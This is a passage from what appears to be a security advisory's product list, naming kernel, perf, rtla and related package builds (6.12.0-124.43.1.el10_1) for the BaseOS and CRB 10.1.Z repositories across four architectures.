"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
